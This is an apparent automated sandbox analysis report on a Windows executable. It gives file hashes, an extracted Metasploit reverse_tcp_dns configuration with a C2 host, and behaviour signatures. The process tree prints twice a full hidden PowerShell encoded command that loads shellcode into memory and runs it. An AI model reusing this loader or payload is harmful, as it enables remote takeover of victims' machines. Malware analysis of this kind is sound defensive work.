Analysis

  • max time kernel
    150s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240611-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system
  • submitted
    22-06-2024 21:48

General

  • Target

    03f9fd2ed89de09d2dbed8de06f8fe76_JaffaCakes118.exe

  • Size

    457KB

  • MD5

    03f9fd2ed89de09d2dbed8de06f8fe76

  • SHA1

    4abfa12b785713bcb8a8d07175114dc903196fc3

  • SHA256

    ddb66647189270d6046b6c95e30900f83ffe9911e77a918dd50a6f09879d1624

  • SHA512

    f11a7029308abaa10f5b5cda1c04997f24d3e275b101533a15aa74645b05ed102f448002bfdeb2df86ca6651ab707eaa20fa1e1835851dc18754b2fdeb9ff1d3

  • SSDEEP

    6144:x9JLFprEWDl7s5t38dX6pKE4dU7kpoTcnFOHuln+Otc+EkzI8jSejCE8aKP3sGvt:x99gbP/GFK9ACwdag/2OuV8IRCg

Malware Config

Extracted

Family

metasploit

Version

encoder/shikata_ga_nai

Extracted

Family

metasploit

Version

windows/reverse_tcp_dns

C2

testme.com:80

Signatures

  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Blocklisted process makes network request 7 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\03f9fd2ed89de09d2dbed8de06f8fe76_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\03f9fd2ed89de09d2dbed8de06f8fe76_JaffaCakes118.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:720
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -window hidden -EncodedCommand JABTADIAaQAgAD0AIAAnACQAbgBmAEkAIAA9ACAAJwAnAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKABJAG4AdABQAHQAcgAgAGwAcABBAGQAZAByAGUAcwBzACwAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABmAGwAQQBsAGwAbwBjAGEAdABpAG8AbgBUAHkAcABlACwAIAB1AGkAbgB0ACAAZgBsAFAAcgBvAHQAZQBjAHQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABBAHQAdAByAGkAYgB1AHQAZQBzACwAIAB1AGkAbgB0ACAAZAB3AFMAdABhAGMAawBTAGkAegBlACwAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAUABhAHIAYQBtAGUAdABlAHIALAAgAHUAaQBuAHQAIABkAHcAQwByAGUAYQB0AGkAbwBuAEYAbABhAGcAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBtAHMAdgBjAHIAdAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAbQBlAG0AcwBlAHQAKABJAG4AdABQAHQAcgAgAGQAZQBzAHQALAAgAHUAaQBuAHQAIABzAHIAYwAsACAAdQBpAG4AdAAgAGMAbwB1AG4AdAApADsAJwAnADsAJAB3ACAAPQAgAEEAZABkAC0AVAB5AHAAZQAgAC0AbQBlAG0AYgBlAHIARABlAGYAaQBuAGkAdABpAG8AbgAgACQAbgBmAEkAIAAtAE4AYQBtAGUAIAAiAFcAaQBuADMAMgAiACAALQBuAGEAbQBlAHMAcABhAGMAZQAgAFcAaQBuADMAMgBGAHUAbgBjAHQAaQBvAG4AcwAgAC0AcABhAHMAcwB0AGgAcgB1ADsAWwBCAHkAdABlAFsAXQBdADsAWwBCAHkAdABlAFsAXQBdACQAegAgAD0AIAAwAHgAYgBlACwAMAB4ADMAMQAsADAAeABkAGQALAAwAHgAOABiACwAMAB4ADIANAAsADAAeABkAGEALAAwAHgAZABiACwAMAB4AGQAOQAsADAAeAA3ADQALAAwAHgAMgA0ACwAMAB4AGYANAAsADAAeAA1ADgALAAwAHgAMgA5ACwAMAB4AGMAOQAsADAAeABiADEALAAwAHgANABjACwAMAB4ADMAMQAsADAAeAA3ADAALAAwAHgAMQA1ACwAMAB4ADgAMwAsADAAeABjADAALAAwAHgAMAA0ACwAMAB4ADAAMwAsADAAeAA3ADAALAAwAHgAMQAxACwAMAB4AGUAMgAsADAAeABjADQALAAwAHgAMgAxACwAMAB4ADYAMwAsADAAeABhADYALAAwAHgAMgA2ACwAMAB4AGQAYQAsADAAeAA3ADQALAAwAHgAYwA3ACwAMAB4AGEAZgAsADAAeAAzAGYALAAwAHgANAA1ACwAMAB4AGMANwAsADAAeABjAGIALAAwAHgAMwA0ACwAMAB4AGYANgAsADAAeABmADcALAAwAHgAOQA4ACwAMAB4ADEAOQAsADAAeABmAGIALAAwAHgANwBjACwAMAB4AGMAYwAsADAAeAA4ADkALAAwAHgAOAA4ACwAMAB4AGYAMQAsADAAeABkADgALAAwAHgAYgBlACwAMAB4ADMAOQAsADAAeABiAGYALAAwAHgAMwBlACwAMAB4AGYAMAAsADAAeABiAGEALAAwAHgAZQBjACwAMAB4ADAAMgAsADAAeAA5ADMALAAwAHgAMwA4ACwAMAB4AGUAZgAsADAAeAA1ADYALAAwAHgANwAzACwAMAB4ADAAMAAsADAAeAAyADAALAAwAHgAYQBiACwAMAB4ADcAMgAsADAAeAA0ADUALAAwAHgANQBkACwAMAB4ADQAMQAsADAAeAAyADYALAAwAHgAMQBlACwAMAB4ADIAOQAsADAAeABmADcALAAwAHgAZAA3ACwAMAB4ADIAYgAsADAAeAA2ADcALAAwAHgAYwBiACwAMAB4ADUAYwAsADAAeAA2ADcALAAwAHgANgA5ACwAMAB4ADQAYgAsADAAeAA4ADAALAAwAHgAMwAwACwAMAB4ADgAOAAsADAAeAA3AGEALAAwAHgAMQA3ACwAMAB4ADQAYQAsADAAeABkADMALAAwAHgANQBjACwAMAB4ADkAOQAsADAAeAA5AGYALAAwAHgANgBmACwAMAB4AGQANQAsADAAeAA4ADEALAAwAHgAZgBjACwAMAB4ADQAYQAsADAAeABhAGMALAAwAHgAMwBhACwAMAB4ADMANgAsADAAeAAyADAALAAwAHgAMgBmACwAMAB4AGUAYgAsADAAeAAwADYALAAwAHgAYwA5ACwAMAB4ADgAMwAsADAAeABkADIALAAwAHgAYQA2ACwAMAB4ADMAOAAsADAAeABkAGEALAAwAHgAMQAzACwAMAB4ADAAMAAsADAAeABhADMALAAwAHgAYQA5ACwAMAB4ADYAZAAsADAAeAA3ADIALAAwAHgANQBlACwAMAB4AGEAOQAsADAAeABhADkALAAwAHgAMAA4ACwAMAB4ADgANAAsADAAeAAzAGMALAAwAHgAMgBhACwAMAB4AGEAYQAsADAAeAA0AGYALAAwAHgAZQA2ACwAMAB4ADkANgAsADAAeAA0AGEALAAwAHgAOAAzACwAMAB4ADcAMAAsADAAeAA1AGMALAAwAHgANAAwACwAMAB4ADYAOAAsADAAeABmADcALAAwAHgAMwBhACwAMAB4ADQANQAsADAAeAA2AGYALAAwAHgAZAA0ACwAMAB4ADMAMAAsADAAeAA3ADEALAAwAHgAZQA0ACwAMAB4AGQAYgAsADAAeAA5ADYALAAwAHgAZgAzACwAMAB4AGIAZQAsADAAeABmAGYALAAwAHgAMwAyACwAMAB4ADUAZgAsADAAeAA2ADQALAAwAHgAOQBlACwAMAB4ADYAMwAsADAAeAAwADUALAAwAHgAYwBiACwAMAB4ADkAZgAsADAAeAA3ADQALAAwAHgAZQA2ACwAMAB4AGIANAAsADAAeAAwADUALAAwAHgAZgBlACwAMAB4ADAAYgAsADAAeABhADAALAAwAHgAMwA0ACwAMAB4ADUAZAAsADAAeAA0ADQALAAwAHgAMAA1ACwAMAB4ADcANAAsADAAeAA1AGUALAAwAHgAOQA0ACwAMAB4ADAAMQAsADAAeAAwAGYALAAwAHgAMgBkACwAMAB4AGEANgAsADAAeAA4AGUALAAwAHgAYgBiACwAMAB4AGIAOQAsADAAeAA4AGEALAAwAHgANAA3ACwAMAB4ADYANQAsADAAeAAzAGQALAAwAHgAZQBjACwAMAB4ADcAZAAsADAAeABkADEALAAwAHgAZAAxACwAMAB4ADEAMwAsADAAeAA3AGUALAAwAHgAMgAxACwAMAB4AGYAYgAsADAAeABkADcALAAwAHgAMgBhACwAMAB4ADcAMQAsADAAeAA5ADMALAAwAHgAZgBlACwAMAB4ADUAMgAsADAAeAAxAGEALAAwAHgANgAzACwAMAB4AGYAZQAsADAAeAA4ADYALAAwAHgAOABjACwAMAB4ADMAMwAsADAAeAA1ADAALAAwAHgANwA5ACwAMAB4ADYAYwAsADAAeABlADQALAAwAHgAMQAwACwAMAB4ADIAOQAsADAAeAAwADQALAAwAHgAZQBlACwAMAB4ADkAZQAsADAAeAAxADYALAAwAHgAMwA0ACwAMAB4ADEAMQAsADAAeAA3ADUALAAwAHgAMwBmACwAMAB4ADUAYwAsADAAeABlADUALAAwAHgANwA2ACwAMAB4ADQAMAAsADAAeAA5AGMALAAwAHgAOABlACwAMAB4ADEAMwAsADAAeAAzADMALAAwAHgAZQA4ACwAMAB4ADAAMwAsADAAeABiADkALAAwAHgAOQBkACwAMAB4ADcAMwAsADAAeABiADMALAAwAHgAMgBjACwAMAB4AGUAMgAsADAAeAAxAGIALAAwAHgAZQAyACwAMAB4ADgANwAsADAAeABkADYALAAwAHgANQBiACwAMAB4ADAAYgAsADAAeAAwADIALAAwAHgAOQBkACwAMAB4ADEAYgAsADAAeABlADgALAAwAHgAYwA3ACwAMAB4AGEAOAAsADAAeABjAGIALAAwAHgANwA4ACwAMAB4ADEAYQAsADAAeABhAGQALAAwAHgAZQBiACwAMAB4ADIAOAAsADAAeAA5ADMALAAwAHgANABiACwAMAB4ADgAMQAsADAAeABkADgALAAwAHgAZgA1ACwAMAB4AGMANAAsADAAeAAzAGQALAAwAHgANAAwACwAMAB4ADUAYwAsADAAeAA5AGUALAAwAHgAZABjACwAMAB4ADgAZAAsADAAeAA0AGEALAAwAHgAZABhACwAMAB4AGQAZQAsADAAeAAwADYALAAwAHgANwA5ACwAMAB4ADEAYQAsADAAeAA5ADAALAAwAHgAZQBlACwAMAB4AGYANAAsADAAeAAwADgALAAwAHgANAA0ACwAMAB4ADEAZgAsADAAeAA0ADMALAAwAHgANwAyACwAMAB4AGMAMgAsADAAeAAyADAALAAwAHgANwA5ACwAMAB4ADEAOQAsADAAeABlAGEALAAwAHgAYgA0ACwAMAB4ADgANgAsADAAeAA4ADgALAAwAHgAYgBkACwAMAB4ADIAMAAsADAAeAA4ADUALAAwAHgAZQBkACwAMAB4ADgAOQAsADAAeABlAGUALAAwAHgANwA2ACwAMAB4AGQAOAAsADAAeAA4ADIALAAwAHgAMgA3ACwAMAB4AGUAMwAsADAAeABhADMALAAwAHgAZgBjACwAMAB4ADQANwAsADAAeABlADMALAAwAHgAMgAzACwAMAB4AGYAYwAsADAAeAAxADEALAAwAHgANgA5ACwAMAB4ADIANAAsADAAeAA5ADQALAAwAHgAYwA1ACwAMAB4AGMAOQAsADAAeAA3ADcALAAwAHgAOAAxACwAMAB4ADAAOQAsADAAeABjADQALAAwAHgAZQBiACwAMAB4ADEAYQAsADAAeAA5AGMALAAwAHgAZQA3ACwAMAB4ADUAZAAsADAAeABjAGYALAAwAHgAMwA3ACwAMAB4ADgAMAAsADAAeAA2ADMALAAwAHgAMwA2ACwAMAB4ADcAZgAsADAAeAAwAGYALAAwAHgAOQBiACwAMAB4ADEAZAAsADAAeAA4ADEALAAwAHgANwAzACwAMAB4ADQAYQAsADAAeAA1AGIALAAwAHgAZgA3ACwAMAB4ADkAZAAsADAAeAA0AGUAOwAkAGcAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAegAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJABnACAAPQAgACQAegAuAEwAZQBuAGcAdABoAH0AOwAkAEYAZQBTAE4APQAkAHcAOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsADAAeAAxADAAMAAwACwAJABnACwAMAB4ADQAMAApADsAZgBvAHIAIAAoACQAaQA9ADAAOwAkAGkAIAAtAGwAZQAgACgAJAB6AC4ATABlAG4AZwB0AGgALQAxACkAOwAkAGkAKwArACkAIAB7ACQAdwA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAEYAZQBTAE4ALgBUAG8ASQBuAHQAMwAyACgAKQArACQAaQApACwAIAAkAHoAWwAkAGkAXQAsACAAMQApAH0AOwAkAHcAOgA6AEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgAMAAsADAALAAkAEYAZQBTAE4ALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQB7AFMAdABhAHIAdAAtAHMAbABlAGUAcAAgADYAMAB9ADsAJwA7ACQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAQgB5AHQAZQBzACgAJABTADIAaQApACkAOwAkAFAARwBwAFcAIAA9ACAAIgAtAGUAbgBjACAAIgA7AGkAZgAoAFsASQBuAHQAUAB0AHIAXQA6ADoAUwBpAHoAZQAgAC0AZQBxACAAOAApAHsAJAA5AFYATQAgAD0AIAAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAAgACsAIAAiAFwAcwB5AHMAdwBvAHcANgA0AFwAVwBpAG4AZABvAHcAcwBQAG8AdwBlAHIAUwBoAGUAbABsAFwAdgAxAC4AMABcAHAAbwB3AGUAcgBzAGgAZQBsAGwAIgA7AGkAZQB4ACAAIgAmACAAJAA5AFYATQAgACQAUABHAHAAVwAgACQAZQAiAH0AZQBsAHMAZQB7ADsAaQBlAHgAIAAiACYAIABwAG8AdwBlAHIAcwBoAGUAbABsACAAJABQAEcAcABXACAAJABlACIAOwB9AA==
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3644
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -window hidden -EncodedCommand JABTADIAaQAgAD0AIAAnACQAbgBmAEkAIAA9ACAAJwAnAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKABJAG4AdABQAHQAcgAgAGwAcABBAGQAZAByAGUAcwBzACwAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABmAGwAQQBsAGwAbwBjAGEAdABpAG8AbgBUAHkAcABlACwAIAB1AGkAbgB0ACAAZgBsAFAAcgBvAHQAZQBjAHQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABBAHQAdAByAGkAYgB1AHQAZQBzACwAIAB1AGkAbgB0ACAAZAB3AFMAdABhAGMAawBTAGkAegBlACwAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAUABhAHIAYQBtAGUAdABlAHIALAAgAHUAaQBuAHQAIABkAHcAQwByAGUAYQB0AGkAbwBuAEYAbABhAGcAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBtAHMAdgBjAHIAdAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAbQBlAG0AcwBlAHQAKABJAG4AdABQAHQAcgAgAGQAZQBzAHQALAAgAHUAaQBuAHQAIABzAHIAYwAsACAAdQBpAG4AdAAgAGMAbwB1AG4AdAApADsAJwAnADsAJAB3ACAAPQAgAEEAZABkAC0AVAB5AHAAZQAgAC0AbQBlAG0AYgBlAHIARABlAGYAaQBuAGkAdABpAG8AbgAgACQAbgBmAEkAIAAtAE4AYQBtAGUAIAAiAFcAaQBuADMAMgAiACAALQBuAGEAbQBlAHMAcABhAGMAZQAgAFcAaQBuADMAMgBGAHUAbgBjAHQAaQBvAG4AcwAgAC0AcABhAHMAcwB0AGgAcgB1ADsAWwBCAHkAdABlAFsAXQBdADsAWwBCAHkAdABlAFsAXQBdACQAegAgAD0AIAAwAHgAYgBlACwAMAB4ADMAMQAsADAAeABkAGQALAAwAHgAOABiACwAMAB4ADIANAAsADAAeABkAGEALAAwAHgAZABiACwAMAB4AGQAOQAsADAAeAA3ADQALAAwAHgAMgA0ACwAMAB4AGYANAAsADAAeAA1ADgALAAwAHgAMgA5ACwAMAB4AGMAOQAsADAAeABiADEALAAwAHgANABjACwAMAB4ADMAMQAsADAAeAA3ADAALAAwAHgAMQA1ACwAMAB4ADgAMwAsADAAeABjADAALAAwAHgAMAA0ACwAMAB4ADAAMwAsADAAeAA3ADAALAAwAHgAMQAxACwAMAB4AGUAMgAsADAAeABjADQALAAwAHgAMgAxACwAMAB4ADYAMwAsADAAeABhADYALAAwAHgAMgA2ACwAMAB4AGQAYQAsADAAeAA3ADQALAAwAHgAYwA3ACwAMAB4AGEAZgAsADAAeAAzAGYALAAwAHgANAA1ACwAMAB4AGMANwAsADAAeABjAGIALAAwAHgAMwA0ACwAMAB4AGYANgAsADAAeABmADcALAAwAHgAOQA4ACwAMAB4ADEAOQAsADAAeABmAGIALAAwAHgANwBjACwAMAB4AGMAYwAsADAAeAA4ADkALAAwAHgAOAA4ACwAMAB4AGYAMQAsADAAeABkADgALAAwAHgAYgBlACwAMAB4ADMAOQAsADAAeABiAGYALAAwAHgAMwBlACwAMAB4AGYAMAAsADAAeABiAGEALAAwAHgAZQBjACwAMAB4ADAAMgAsADAAeAA5ADMALAAwAHgAMwA4ACwAMAB4AGUAZgAsADAAeAA1ADYALAAwAHgANwAzACwAMAB4ADAAMAAsADAAeAAyADAALAAwAHgAYQBiACwAMAB4ADcAMgAsADAAeAA0ADUALAAwAHgANQBkACwAMAB4ADQAMQAsADAAeAAyADYALAAwAHgAMQBlACwAMAB4ADIAOQAsADAAeABmADcALAAwAHgAZAA3ACwAMAB4ADIAYgAsADAAeAA2ADcALAAwAHgAYwBiACwAMAB4ADUAYwAsADAAeAA2ADcALAAwAHgANgA5ACwAMAB4ADQAYgAsADAAeAA4ADAALAAwAHgAMwAwACwAMAB4ADgAOAAsADAAeAA3AGEALAAwAHgAMQA3ACwAMAB4ADQAYQAsADAAeABkADMALAAwAHgANQBjACwAMAB4ADkAOQAsADAAeAA5AGYALAAwAHgANgBmACwAMAB4AGQANQAsADAAeAA4ADEALAAwAHgAZgBjACwAMAB4ADQAYQAsADAAeABhAGMALAAwAHgAMwBhACwAMAB4ADMANgAsADAAeAAyADAALAAwAHgAMgBmACwAMAB4AGUAYgAsADAAeAAwADYALAAwAHgAYwA5ACwAMAB4ADgAMwAsADAAeABkADIALAAwAHgAYQA2ACwAMAB4ADMAOAAsADAAeABkAGEALAAwAHgAMQAzACwAMAB4ADAAMAAsADAAeABhADMALAAwAHgAYQA5ACwAMAB4ADYAZAAsADAAeAA3ADIALAAwAHgANQBlACwAMAB4AGEAOQAsADAAeABhADkALAAwAHgAMAA4ACwAMAB4ADgANAAsADAAeAAzAGMALAAwAHgAMgBhACwAMAB4AGEAYQAsADAAeAA0AGYALAAwAHgAZQA2ACwAMAB4ADkANgAsADAAeAA0AGEALAAwAHgAOAAzACwAMAB4ADcAMAAsADAAeAA1AGMALAAwAHgANAAwACwAMAB4ADYAOAAsADAAeABmADcALAAwAHgAMwBhACwAMAB4ADQANQAsADAAeAA2AGYALAAwAHgAZAA0ACwAMAB4ADMAMAAsADAAeAA3ADEALAAwAHgAZQA0ACwAMAB4AGQAYgAsADAAeAA5ADYALAAwAHgAZgAzACwAMAB4AGIAZQAsADAAeABmAGYALAAwAHgAMwAyACwAMAB4ADUAZgAsADAAeAA2ADQALAAwAHgAOQBlACwAMAB4ADYAMwAsADAAeAAwADUALAAwAHgAYwBiACwAMAB4ADkAZgAsADAAeAA3ADQALAAwAHgAZQA2ACwAMAB4AGIANAAsADAAeAAwADUALAAwAHgAZgBlACwAMAB4ADAAYgAsADAAeABhADAALAAwAHgAMwA0ACwAMAB4ADUAZAAsADAAeAA0ADQALAAwAHgAMAA1ACwAMAB4ADcANAAsADAAeAA1AGUALAAwAHgAOQA0ACwAMAB4ADAAMQAsADAAeAAwAGYALAAwAHgAMgBkACwAMAB4AGEANgAsADAAeAA4AGUALAAwAHgAYgBiACwAMAB4AGIAOQAsADAAeAA4AGEALAAwAHgANAA3ACwAMAB4ADYANQAsADAAeAAzAGQALAAwAHgAZQBjACwAMAB4ADcAZAAsADAAeABkADEALAAwAHgAZAAxACwAMAB4ADEAMwAsADAAeAA3AGUALAAwAHgAMgAxACwAMAB4AGYAYgAsADAAeABkADcALAAwAHgAMgBhACwAMAB4ADcAMQAsADAAeAA5ADMALAAwAHgAZgBlACwAMAB4ADUAMgAsADAAeAAxAGEALAAwAHgANgAzACwAMAB4AGYAZQAsADAAeAA4ADYALAAwAHgAOABjACwAMAB4ADMAMwAsADAAeAA1ADAALAAwAHgANwA5ACwAMAB4ADYAYwAsADAAeABlADQALAAwAHgAMQAwACwAMAB4ADIAOQAsADAAeAAwADQALAAwAHgAZQBlACwAMAB4ADkAZQAsADAAeAAxADYALAAwAHgAMwA0ACwAMAB4ADEAMQAsADAAeAA3ADUALAAwAHgAMwBmACwAMAB4ADUAYwAsADAAeABlADUALAAwAHgANwA2ACwAMAB4ADQAMAAsADAAeAA5AGMALAAwAHgAOABlACwAMAB4ADEAMwAsADAAeAAzADMALAAwAHgAZQA4ACwAMAB4ADAAMwAsADAAeABiADkALAAwAHgAOQBkACwAMAB4ADcAMwAsADAAeABiADMALAAwAHgAMgBjACwAMAB4AGUAMgAsADAAeAAxAGIALAAwAHgAZQAyACwAMAB4ADgANwAsADAAeABkADYALAAwAHgANQBiACwAMAB4ADAAYgAsADAAeAAwADIALAAwAHgAOQBkACwAMAB4ADEAYgAsADAAeABlADgALAAwAHgAYwA3ACwAMAB4AGEAOAAsADAAeABjAGIALAAwAHgANwA4ACwAMAB4ADEAYQAsADAAeABhAGQALAAwAHgAZQBiACwAMAB4ADIAOAAsADAAeAA5ADMALAAwAHgANABiACwAMAB4ADgAMQAsADAAeABkADgALAAwAHgAZgA1ACwAMAB4AGMANAAsADAAeAAzAGQALAAwAHgANAAwACwAMAB4ADUAYwAsADAAeAA5AGUALAAwAHgAZABjACwAMAB4ADgAZAAsADAAeAA0AGEALAAwAHgAZABhACwAMAB4AGQAZQAsADAAeAAwADYALAAwAHgANwA5ACwAMAB4ADEAYQAsADAAeAA5ADAALAAwAHgAZQBlACwAMAB4AGYANAAsADAAeAAwADgALAAwAHgANAA0ACwAMAB4ADEAZgAsADAAeAA0ADMALAAwAHgANwAyACwAMAB4AGMAMgAsADAAeAAyADAALAAwAHgANwA5ACwAMAB4ADEAOQAsADAAeABlAGEALAAwAHgAYgA0ACwAMAB4ADgANgAsADAAeAA4ADgALAAwAHgAYgBkACwAMAB4ADIAMAAsADAAeAA4ADUALAAwAHgAZQBkACwAMAB4ADgAOQAsADAAeABlAGUALAAwAHgANwA2ACwAMAB4AGQAOAAsADAAeAA4ADIALAAwAHgAMgA3ACwAMAB4AGUAMwAsADAAeABhADMALAAwAHgAZgBjACwAMAB4ADQANwAsADAAeABlADMALAAwAHgAMgAzACwAMAB4AGYAYwAsADAAeAAxADEALAAwAHgANgA5ACwAMAB4ADIANAAsADAAeAA5ADQALAAwAHgAYwA1ACwAMAB4AGMAOQAsADAAeAA3ADcALAAwAHgAOAAxACwAMAB4ADAAOQAsADAAeABjADQALAAwAHgAZQBiACwAMAB4ADEAYQAsADAAeAA5AGMALAAwAHgAZQA3ACwAMAB4ADUAZAAsADAAeABjAGYALAAwAHgAMwA3ACwAMAB4ADgAMAAsADAAeAA2ADMALAAwAHgAMwA2ACwAMAB4ADcAZgAsADAAeAAwAGYALAAwAHgAOQBiACwAMAB4ADEAZAAsADAAeAA4ADEALAAwAHgANwAzACwAMAB4ADQAYQAsADAAeAA1AGIALAAwAHgAZgA3ACwAMAB4ADkAZAAsADAAeAA0AGUAOwAkAGcAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAegAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJABnACAAPQAgACQAegAuAEwAZQBuAGcAdABoAH0AOwAkAEYAZQBTAE4APQAkAHcAOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsADAAeAAxADAAMAAwACwAJABnACwAMAB4ADQAMAApADsAZgBvAHIAIAAoACQAaQA9ADAAOwAkAGkAIAAtAGwAZQAgACgAJAB6AC4ATABlAG4AZwB0AGgALQAxACkAOwAkAGkAKwArACkAIAB7ACQAdwA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAEYAZQBTAE4ALgBUAG8ASQBuAHQAMwAyACgAKQArACQAaQApACwAIAAkAHoAWwAkAGkAXQAsACAAMQApAH0AOwAkAHcAOgA6AEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgAMAAsADAALAAkAEYAZQBTAE4ALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQB7AFMAdABhAHIAdAAtAHMAbABlAGUAcAAgADYAMAB9ADsAJwA7ACQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAQgB5AHQAZQBzACgAJABTADIAaQApACkAOwAkAFAARwBwAFcAIAA9ACAAIgAtAGUAbgBjACAAIgA7AGkAZgAoAFsASQBuAHQAUAB0AHIAXQA6ADoAUwBpAHoAZQAgAC0AZQBxACAAOAApAHsAJAA5AFYATQAgAD0AIAAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAAgACsAIAAiAFwAcwB5AHMAdwBvAHcANgA0AFwAVwBpAG4AZABvAHcAcwBQAG8AdwBlAHIAUwBoAGUAbABsAFwAdgAxAC4AMABcAHAAbwB3AGUAcgBzAGgAZQBsAGwAIgA7AGkAZQB4ACAAIgAmACAAJAA5AFYATQAgACQAUABHAHAAVwAgACQAZQAiAH0AZQBsAHMAZQB7ADsAaQBlAHgAIAAiACYAIABwAG8AdwBlAHIAcwBoAGUAbABsACAAJABQAEcAcABXACAAJABlACIAOwB9AA==
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1988
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
